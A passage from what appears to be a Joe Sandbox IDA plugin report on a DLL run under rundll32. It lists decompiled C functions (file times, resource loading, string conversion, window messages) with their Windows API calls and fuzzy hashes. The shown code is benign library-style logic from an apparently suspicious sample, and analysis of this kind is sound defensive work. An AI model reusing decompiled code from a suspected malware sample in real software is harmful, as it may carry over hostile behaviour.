                                                                        									_t31 = E1002049B(_t63);
                                                                        									if((_t31 & 0x00020000) == 0) {
                                                                        										continue;
                                                                        									}
                                                                        								} else {
                                                                        									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
                                                                        										goto L16;
                                                                        									} else {
                                                                        										_t63 = _v8;
                                                                        										goto L13;
                                                                        									}
                                                                        								}
                                                                        								goto L18;
                                                                        							}
                                                                        						} else {
                                                                        							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
                                                                        							_t44 = _a4;
                                                                        							if(_t47 == 1) {
                                                                        								L17:
                                                                        								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
                                                                        							} else {
                                                                        								goto L4;
                                                                        							}
                                                                        						}
                                                                        						L18:
                                                                        					}
                                                                        				}
                                                                        				return _t31;
                                                                        			}













                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
                                                                        • Instruction ID: 409e1e54ae5c96ed2e58890ddbbbae16c890d09ac2c6be6a3a2fbe05691f9f0c
                                                                        • Opcode Fuzzy Hash: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
                                                                        • Instruction Fuzzy Hash: 29315C30A00219EFDB15DF55D890EAE3BAAEF45390F50806AF54A9B213DA71ED80DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10026B4F(void* __ecx, signed int* _a4) {
                                                                        				char _v12;
                                                                        				struct _FILETIME _v20;
                                                                        				struct _FILETIME _v28;
                                                                        				char _v36;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* _t43;
                                                                        				long _t48;
                                                                        				signed int* _t51;
                                                                        				signed int* _t54;
                                                                        				signed int* _t57;
                                                                        				struct _FILETIME* _t67;
                                                                        				void* _t81;
                                                                        				CHAR* _t82;
                                                                        				signed int* _t83;
                                                                        				void* _t86;
                                                                        
                                                                        				_t83 = _a4;
                                                                        				_t81 = __ecx;
                                                                        				E10011C50(_t83, 0, 0x128);
                                                                        				lstrcpynA( &(_t83[8]),  *(_t81 + 0xc), 0x104);
                                                                        				_t43 =  *(_t81 + 4);
                                                                        				_t86 = _t43 -  *0x100401d4; // 0xffffffff
                                                                        				if(_t86 == 0) {
                                                                        					L12:
                                                                        					return 1;
                                                                        				}
                                                                        				_t67 =  &_v12;
                                                                        				if(GetFileTime(_t43, _t67,  &_v20,  &_v28) == 0) {
                                                                        					L4:
                                                                        					return 0;
                                                                        				}
                                                                        				_t48 = GetFileSize( *(_t81 + 4), 0);
                                                                        				_t83[6] = _t48;
                                                                        				_t83[7] = 0;
                                                                        				if(_t48 != 0xffffffff || 0 != 0) {
                                                                        					_t82 =  *(_t81 + 0xc);
                                                                        					if( *((intOrPtr*)(_t82 - 0xc)) != 0) {
                                                                        						_t83[8] = (_t67 & 0xffffff00 | GetFileAttributesA(_t82) == 0xffffffff) - 0x00000001 & _t49;
                                                                        					} else {
                                                                        						_t83[8] = 0;
                                                                        					}
                                                                        					_t51 = E10010239(0,  &_v36, _t82,  &_v12, 0xffffffff);
                                                                        					 *_t83 =  *_t51;
                                                                        					_t83[1] = _t51[1];
                                                                        					_t54 = E10010239(0,  &_v36, _t82,  &_v20, 0xffffffff);
                                                                        					_t83[4] =  *_t54;
                                                                        					_t83[5] = _t54[1];
                                                                        					_t57 = E10010239(0,  &_v36, _t82,  &_v28, 0xffffffff);
                                                                        					_t83[2] =  *_t57;
                                                                        					_t83[3] = _t57[1];
                                                                        					if(( *_t83 | _t83[1]) == 0) {
                                                                        						 *_t83 =  *_t57;
                                                                        						_t83[1] = _t57[1];
                                                                        					}
                                                                        					if((_t83[4] | _t83[5]) == 0) {
                                                                        						_t83[4] = _t83[2];
                                                                        						_t83[5] = _t83[3];
                                                                        					}
                                                                        					goto L12;
                                                                        				} else {
                                                                        					goto L4;
                                                                        				}
                                                                        			}




















                                                                        APIs
                                                                        • lstrcpynA.KERNEL32(?,?,00000104), ref: 10026B7A
                                                                        • GetFileTime.KERNEL32(?,?,?,?), ref: 10026B9C
                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 10026BAA
                                                                        • GetFileAttributesA.KERNEL32(?), ref: 10026BD4
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesSizeTimelstrcpyn
                                                                        • String ID:
                                                                        • API String ID: 1499663573-0
                                                                        • Opcode ID: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
                                                                        • Instruction ID: a18b0f555d231170b7735eacb595d982f5b9ad02e146dd108c4f4c0e1a6c5240
                                                                        • Opcode Fuzzy Hash: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
                                                                        • Instruction Fuzzy Hash: 06419CB56006059FC724DFA4DD84CAABBF8FF093103508A2EE1A6D76A0E730F944CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 29%
                                                                        			E1000C29A(void* _a4, intOrPtr _a8) {
                                                                        				char _v8;
                                                                        				char _v24;
                                                                        				intOrPtr _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				char _v56;
                                                                        				char _v60;
                                                                        				intOrPtr _t39;
                                                                        				intOrPtr* _t41;
                                                                        				intOrPtr* _t47;
                                                                        				intOrPtr _t48;
                                                                        				intOrPtr* _t49;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr* _t60;
                                                                        				void* _t71;
                                                                        
                                                                        				_t71 = _a4 + 0xffffff2c;
                                                                        				if( *((intOrPtr*)(_t71 + 0x84)) != 0) {
                                                                        					return 0;
                                                                        				}
                                                                        				_t58 = _a8;
                                                                        				if( *((intOrPtr*)(_t71 + 0x8c)) != 0) {
                                                                        					L4:
                                                                        					if( *((intOrPtr*)(_t71 + 0x98)) == _t58) {
                                                                        						__imp__#9(_t71 + 0xa8);
                                                                        						_t41 =  *((intOrPtr*)(_t71 + 0x4c));
                                                                        						_push( &_a4);
                                                                        						_push(0x10043098);
                                                                        						_a4 = 0;
                                                                        						_push(_t41);
                                                                        						if( *((intOrPtr*)( *_t41))() >= 0) {
                                                                        							E10011C50( &_v56, 0, 0x20);
                                                                        							E10011C50( &_v24, 0, 0x10);
                                                                        							_t47 = _a4;
                                                                        							_t48 =  *((intOrPtr*)( *_t47 + 0x18))(_t47, _t58, 0x10043018, 0, 2,  &_v24, _t71 + 0xa8,  &_v56,  &_v8);
                                                                        							_t60 = __imp__#6;
                                                                        							_a8 = _t48;
                                                                        							if(_v52 != 0) {
                                                                        								 *_t60(_v52);
                                                                        							}
                                                                        							if(_v48 != 0) {
                                                                        								 *_t60(_v48);
                                                                        							}
                                                                        							if(_v44 != 0) {
                                                                        								 *_t60(_v44);
                                                                        							}
                                                                        							_t49 = _a4;
                                                                        							 *((intOrPtr*)( *_t49 + 8))(_t49);
                                                                        							if(_a8 >= 0) {
                                                                        								 *((intOrPtr*)(_t71 + 0xa4)) = 1;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					_t39 = 0;
                                                                        					goto L15;
                                                                        				} else {
                                                                        					_v60 = 2;
                                                                        					_v56 = _t58;
                                                                        					_v52 = 0;
                                                                        					_v48 = 0;
                                                                        					_v44 = 0;
                                                                        					_v36 = 0;
                                                                        					_v32 = 0;
                                                                        					_v28 = 0;
                                                                        					E1000A823(_t71,  &_v60);
                                                                        					_t39 = _v36;
                                                                        					if(_t39 != 0) {
                                                                        						L15:
                                                                        						return _t39;
                                                                        					}
                                                                        					goto L4;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: FreeString$ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 3349467263-0
                                                                        • Opcode ID: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
                                                                        • Instruction ID: 552477abdee19e13ea1b462c0c8e49e77f6f834a68e9ea303e894a8b6247ec6d
                                                                        • Opcode Fuzzy Hash: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
                                                                        • Instruction Fuzzy Hash: E3310571A10229BFDB04DFA5C884EDEBBB9FF08790F10811AF559A6245C770AA54CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E1001C5D1(void* __ecx, void* __eflags) {
                                                                        				short* _t40;
                                                                        				intOrPtr _t42;
                                                                        				int _t57;
                                                                        				short* _t63;
                                                                        				int _t65;
                                                                        				void* _t66;
                                                                        				short* _t67;
                                                                        
                                                                        				_t58 = __ecx;
                                                                        				_t67 =  *(_t66 - 0x18);
                                                                        				E10010839(__ecx, __eflags);
                                                                        				 *(_t66 - 0x34) =  *(_t66 - 0x34) & 0x00000000;
                                                                        				 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
                                                                        				_t57 =  *(_t66 - 0x48);
                                                                        				_t65 = 1;
                                                                        				_t63 = 0;
                                                                        				_t40 =  *(_t66 - 0x34);
                                                                        				if(_t40 != 0) {
                                                                        					L4:
                                                                        					if(MultiByteToWideChar( *(_t66 + 0x20), _t65,  *(_t66 + 0x10),  *(_t66 + 0x14), _t40, _t57) != 0) {
                                                                        						_t65 = MultiByteToWideChar( *(_t66 + 0x20), 9,  *(_t66 + 0x18),  *(_t66 + 0x1c), 0, 0);
                                                                        						 *(_t66 - 0x4c) = _t65;
                                                                        						if(_t65 != 0) {
                                                                        							 *(_t66 - 4) = 1;
                                                                        							E10010B20(_t65 + _t65 + 0x00000003 & 0xfffffffc, _t58);
                                                                        							 *(_t66 - 0x18) = _t67;
                                                                        							_t63 = _t67;
                                                                        							 *(_t66 - 0x50) = _t63;
                                                                        							 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
                                                                        							if(_t63 != 0) {
                                                                        								L10:
                                                                        								if(MultiByteToWideChar( *(_t66 + 0x20), 1,  *(_t66 + 0x18),  *(_t66 + 0x1c), _t63, _t65) != 0) {
                                                                        									 *((intOrPtr*)(_t66 - 0x40)) = CompareStringW( *(_t66 + 8),  *(_t66 + 0xc),  *(_t66 - 0x34), _t57, _t63, _t65);
                                                                        								}
                                                                        								_t78 =  *(_t66 - 0x44);
                                                                        								if( *(_t66 - 0x44) != 0) {
                                                                        									_push(_t63);
                                                                        									E100107C8(_t57, _t63, _t65, _t78);
                                                                        								}
                                                                        							} else {
                                                                        								_t63 = E100107B6(_t65 + _t65);
                                                                        								if(_t63 != 0) {
                                                                        									 *(_t66 - 0x44) = 1;
                                                                        									goto L10;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					_t79 =  *((intOrPtr*)(_t66 - 0x3c));
                                                                        					if( *((intOrPtr*)(_t66 - 0x3c)) != 0) {
                                                                        						_push( *(_t66 - 0x34));
                                                                        						E100107C8(_t57, _t63, _t65, _t79);
                                                                        					}
                                                                        					_t42 =  *((intOrPtr*)(_t66 - 0x40));
                                                                        				} else {
                                                                        					_t40 = E100107B6(_t57 + _t57);
                                                                        					_pop(_t58);
                                                                        					 *(_t66 - 0x34) = _t40;
                                                                        					if(_t40 == 0) {
                                                                        						_t42 = 0;
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_t66 - 0x3c)) = 1;
                                                                        						goto L4;
                                                                        					}
                                                                        				}
                                                                        				return E1001254F(E100117AE(_t42,  *((intOrPtr*)(_t66 - 0x1c))));
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 10010839: VirtualQuery.KERNEL32(?,?,0000001C), ref: 10010853
                                                                          • Part of subcall function 10010839: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10010864
                                                                          • Part of subcall function 10010839: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 100108AA
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C614
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,100101C3,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C631
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,100101C3,?,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C6A7
                                                                        • CompareStringW.KERNEL32(?,?,00000190,00000000,?,00000000,?,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001C6BD
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
                                                                        • String ID:
                                                                        • API String ID: 1997773198-0
                                                                        • Opcode ID: b90460355c9c416a6456121d1bbb326fafcad12d6a2343548d863fd2063eeb59
                                                                        • Instruction ID: af3dbc7b5439278e81a751fce9c258c26a76ae2c050a4fbf0b7815c8002a2a19
                                                                        • Opcode Fuzzy Hash: b90460355c9c416a6456121d1bbb326fafcad12d6a2343548d863fd2063eeb59
                                                                        • Instruction Fuzzy Hash: B131263290121DABDF21CFA0DC85E9E7BB6EF08760F204114F955AA1A1DB70EA91DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E10036A6D(intOrPtr __ecx, CHAR* _a4) {
                                                                        				intOrPtr _v8;
                                                                        				void* _v12;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				struct HRSRC__* _t22;
                                                                        				signed short _t23;
                                                                        				void* _t24;
                                                                        				signed int _t29;
                                                                        				signed short _t31;
                                                                        				void* _t37;
                                                                        				signed short _t38;
                                                                        				signed short* _t47;
                                                                        				void* _t53;
                                                                        				struct HINSTANCE__* _t56;
                                                                        				void* _t58;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_v8 = __ecx;
                                                                        				_t56 =  *(E100373B5() + 0xc);
                                                                        				_t22 = FindResourceA(_t56, _a4, 0xf1);
                                                                        				if(_t22 == 0) {
                                                                        					L3:
                                                                        					_t23 = 0;
                                                                        				} else {
                                                                        					_t24 = LoadResource(_t56, _t22);
                                                                        					_v12 = _t24;
                                                                        					if(_t24 == 0) {
                                                                        						goto L3;
                                                                        					} else {
                                                                        						_t58 = LockResource(_t24);
                                                                        						if(_t58 != 0) {
                                                                        							_push(_t37);
                                                                        							_t53 = E1001F77E(( *(_t58 + 6) & 0x0000ffff) << 2);
                                                                        							_t29 = 0;
                                                                        							__eflags =  *(_t58 + 6);
                                                                        							if( *(_t58 + 6) > 0) {
                                                                        								_t7 = _t58 + 8; // 0x8
                                                                        								_t47 = _t7;
                                                                        								do {
                                                                        									 *(_t53 + _t29 * 4) =  *_t47 & 0x0000ffff;
                                                                        									_t29 = _t29 + 1;
                                                                        									_t47 =  &(_t47[1]);
                                                                        									__eflags = _t29 - ( *(_t58 + 6) & 0x0000ffff);
                                                                        								} while (_t29 < ( *(_t58 + 6) & 0x0000ffff));
                                                                        							}
                                                                        							_t31 = E100366B1(_t37, _v8, _t53, _t58, _t53,  *(_t58 + 6) & 0x0000ffff);
                                                                        							_push(_t53);
                                                                        							_t38 = _t31;
                                                                        							L1001F7A9(_t38, _t53, _t58, __eflags);
                                                                        							__eflags = _t38;
                                                                        							if(_t38 != 0) {
                                                                        								_t44 =  *(_t58 + 4) & 0x0000ffff;
                                                                        								E100368F3(_v8, ( *(_t58 + 2) & 0x0000ffff) + 7, ( *(_t58 + 4) & 0x0000ffff) + 7,  *(_t58 + 2) & 0x0000ffff, _t44);
                                                                        								_t38 = E1003697A(_v8, _a4);
                                                                        							}
                                                                        							FreeResource(_v12);
                                                                        							_t23 = _t38;
                                                                        						} else {
                                                                        							goto L3;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t23;
                                                                        			}





















                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,?,000000F1), ref: 10036A87
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 10036A93
                                                                        • LockResource.KERNEL32(00000000), ref: 10036AA1
                                                                        • FreeResource.KERNEL32(?), ref: 10036B24
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLock
                                                                        • String ID:
                                                                        • API String ID: 1078018258-0
                                                                        • Opcode ID: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
                                                                        • Instruction ID: 90f7a23fa8f058c3dd6ac9528b305ebca7cc9ac8441aa778f718171523645421
                                                                        • Opcode Fuzzy Hash: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
                                                                        • Instruction Fuzzy Hash: 6321B375500621AED716DFA1CC84CBBB7ECEF48642B00C429F946DB251EB30ED41DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E10016396() {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t5;
                                                                        				signed int _t6;
                                                                        				signed int _t11;
                                                                        				signed int _t12;
                                                                        				signed int _t13;
                                                                        				signed int _t24;
                                                                        				signed int _t25;
                                                                        				signed int _t26;
                                                                        				signed int _t27;
                                                                        				void* _t30;
                                                                        				intOrPtr _t32;
                                                                        
                                                                        				_t32 =  *0x10050cac; // 0x1
                                                                        				if(_t32 == 0) {
                                                                        					_t5 = E10012D82();
                                                                        				}
                                                                        				_t26 =  *0x1004f3cc; // 0x0
                                                                        				_t24 = 0;
                                                                        				if(_t26 != 0) {
                                                                        					while(1) {
                                                                        						_t6 =  *_t26;
                                                                        						__eflags = _t6;
                                                                        						if(_t6 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t6 - 0x3d;
                                                                        						if(_t6 != 0x3d) {
                                                                        							_t24 = _t24 + 1;
                                                                        							__eflags = _t24;
                                                                        						}
                                                                        						_t26 = _t26 + E10011820(_t26) + 1;
                                                                        					}
                                                                        					_t5 = E100107B6(4 + _t24 * 4);
                                                                        					_t25 = _t5;
                                                                        					__eflags = _t25;
                                                                        					 *0x1004f400 = _t25;
                                                                        					if(_t25 != 0) {
                                                                        						_t27 =  *0x1004f3cc; // 0x0
                                                                        						while(1) {
                                                                        							__eflags =  *_t27;
                                                                        							if(__eflags == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t30 = E10011820(_t27) + 1;
                                                                        							__eflags =  *_t27 - 0x3d;
                                                                        							if( *_t27 == 0x3d) {
                                                                        								L14:
                                                                        								_t27 = _t27 + _t30;
                                                                        								__eflags = _t27;
                                                                        								continue;
                                                                        							}
                                                                        							_t12 = E100107B6(_t30);
                                                                        							__eflags = _t12;
                                                                        							 *_t25 = _t12;
                                                                        							if(__eflags == 0) {
                                                                        								_push( *0x1004f400);
                                                                        								_t13 = E100107C8(0, _t25, _t27, __eflags);
                                                                        								 *0x1004f400 = 0;
                                                                        								_t11 = _t13 | 0xffffffff;
                                                                        								L17:
                                                                        								return _t11;
                                                                        							}
                                                                        							E10017B90(_t12, _t27);
                                                                        							_t25 = _t25 + 4;
                                                                        							__eflags = _t25;
                                                                        							goto L14;
                                                                        						}
                                                                        						_push( *0x1004f3cc);
                                                                        						E100107C8(0, _t25, _t27, __eflags);
                                                                        						 *0x1004f3cc = 0;
                                                                        						 *_t25 = 0;
                                                                        						 *0x10050ca0 = 1;
                                                                        						_t11 = 0;
                                                                        						__eflags = 0;
                                                                        						goto L17;
                                                                        					}
                                                                        					goto L9;
                                                                        				} else {
                                                                        					L9:
                                                                        					return _t5 | 0xffffffff;
                                                                        				}
                                                                        			}



















                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen$___initmbctable_strcat
                                                                        • String ID:
                                                                        • API String ID: 109824703-0
                                                                        • Opcode ID: 5025062238c4e1958a2116478a36e172273b85c72821fd6fbf3ceedd2c77b50d
                                                                        • Instruction ID: 9c1e1b94b0f4e2beb856a7037c8e8469e0ad574bad187944a6078983aed9c00d
                                                                        • Opcode Fuzzy Hash: 5025062238c4e1958a2116478a36e172273b85c72821fd6fbf3ceedd2c77b50d
                                                                        • Instruction Fuzzy Hash: 831159768081A24EE311DF64AD8466A7BC5EB0B2B4721023EF1E0DB092DF31F9C1DB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E1002C73E(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a12) {
                                                                        				intOrPtr _v12;
                                                                        				char _v16;
                                                                        				struct tagRECT _v32;
                                                                        				struct HDC__* _v44;
                                                                        				char _v52;
                                                                        				struct tagTEXTMETRICA _v108;
                                                                        				void* __ebp;
                                                                        				long _t25;
                                                                        				int _t35;
                                                                        				intOrPtr* _t40;
                                                                        				void* _t43;
                                                                        				intOrPtr _t53;
                                                                        				intOrPtr* _t59;
                                                                        				intOrPtr _t60;
                                                                        
                                                                        				_t59 = __ecx;
                                                                        				_push(0);
                                                                        				E100290F7( &_v52);
                                                                        				_t25 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
                                                                        				_t43 = 0;
                                                                        				if(_t25 != 0) {
                                                                        					_t43 = E1000866D( &_v52, _t25);
                                                                        				}
                                                                        				GetTextMetricsA(_v44,  &_v108);
                                                                        				_t62 = _t43;
                                                                        				if(_t43 != 0) {
                                                                        					E1000866D( &_v52, _t43);
                                                                        				}
                                                                        				E10029152( &_v52, _t62);
                                                                        				SetRectEmpty( &_v32);
                                                                        				 *((intOrPtr*)( *_t59 + 0x13c))( &_v32, _a12);
                                                                        				 *((intOrPtr*)( *_t59 + 0x110))(0x407, 0,  &_v16);
                                                                        				_t35 = GetSystemMetrics(6);
                                                                        				_t60 =  *((intOrPtr*)(_t59 + 0x90));
                                                                        				_t53 = (_t35 + _v12 << 1) - _v32.bottom - _v32.top - _v108.tmInternalLeading + _v108.tmHeight - 1;
                                                                        				if(_t53 < _t60) {
                                                                        					_t53 = _t60;
                                                                        				}
                                                                        				_t40 = _a4;
                                                                        				 *_t40 = 0x7fff;
                                                                        				 *((intOrPtr*)(_t40 + 4)) = _t53;
                                                                        				return _t40;
                                                                        			}


















                                                                        APIs
                                                                          • Part of subcall function 100290F7: __EH_prolog.LIBCMT ref: 100290FC
                                                                          • Part of subcall function 100290F7: GetDC.USER32(00000000), ref: 1002912A
                                                                        • SendMessageA.USER32 ref: 1002C75B
                                                                        • GetTextMetricsA.GDI32(?,?), ref: 1002C779
                                                                        • SetRectEmpty.USER32(?), ref: 1002C798
                                                                        • GetSystemMetrics.USER32 ref: 1002C7D0
                                                                          • Part of subcall function 1000866D: SelectObject.GDI32(?,?), ref: 1000867C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Metrics$EmptyH_prologMessageObjectRectSelectSendSystemText
                                                                        • String ID:
                                                                        • API String ID: 1847300772-0
                                                                        • Opcode ID: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
                                                                        • Instruction ID: 7e47f88f2f58757794e6d6d0f1f8ec1525fff8c624cfc69816e05b16ce6d54a2
                                                                        • Opcode Fuzzy Hash: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
                                                                        • Instruction Fuzzy Hash: 67217936A00218AFDB15DFA8DC89CEEBBB9FF88700F414529F512A7291DB717945CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 81%
                                                                        			E1000BEEF(void* __edi) {
                                                                        				intOrPtr _t35;
                                                                        				intOrPtr _t46;
                                                                        				intOrPtr _t48;
                                                                        				intOrPtr _t50;
                                                                        				signed int _t60;
                                                                        				void* _t63;
                                                                        
                                                                        				E10011BF0(0x1003aec3, _t63);
                                                                        				_t60 = 0;
                                                                        				 *((intOrPtr*)(_t63 - 0x10)) = 0;
                                                                        				 *((intOrPtr*)(_t63 - 0x14)) = 0x10040668;
                                                                        				_t48 =  *((intOrPtr*)(_t63 + 8));
